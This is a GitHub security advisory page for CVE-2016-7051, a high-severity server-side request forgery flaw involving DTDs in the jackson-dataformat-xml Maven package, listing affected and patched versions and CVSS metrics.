Skip to content

jackson-dataformat-xml vulnerable to server side request forgery (SSRF)

High severity GitHub Reviewed Published Oct 18, 2018 to the GitHub Advisory Database • Updated Jan 8, 2023

Package

maven com.fasterxml.jackson.dataformat:jackson-dataformat-xml (Maven)

Affected versions

< 2.7.8
>= 2.8.0, < 2.8.4

Patched versions

2.7.8
2.8.4

Description

Versions of jackson-dataformat-xml) prior to 2.7.8 and prior to 2.8.4 allow remote attackers to conduct server-side request forgery (SSRF) attacks via vectors related to a DTD.

References

Published to the GitHub Advisory Database Oct 18, 2018
Reviewed Jun 16, 2020
Last updated Jan 8, 2023

Severity

High
8.6
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Changed
Confidentiality
None
Integrity
High
Availability
None
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N

Weaknesses

CVE ID

CVE-2016-7051

GHSA ID

GHSA-7c2r-3jqf-c9rw

Source code

Checking history
See something to contribute? Suggest improvements for this vulnerability.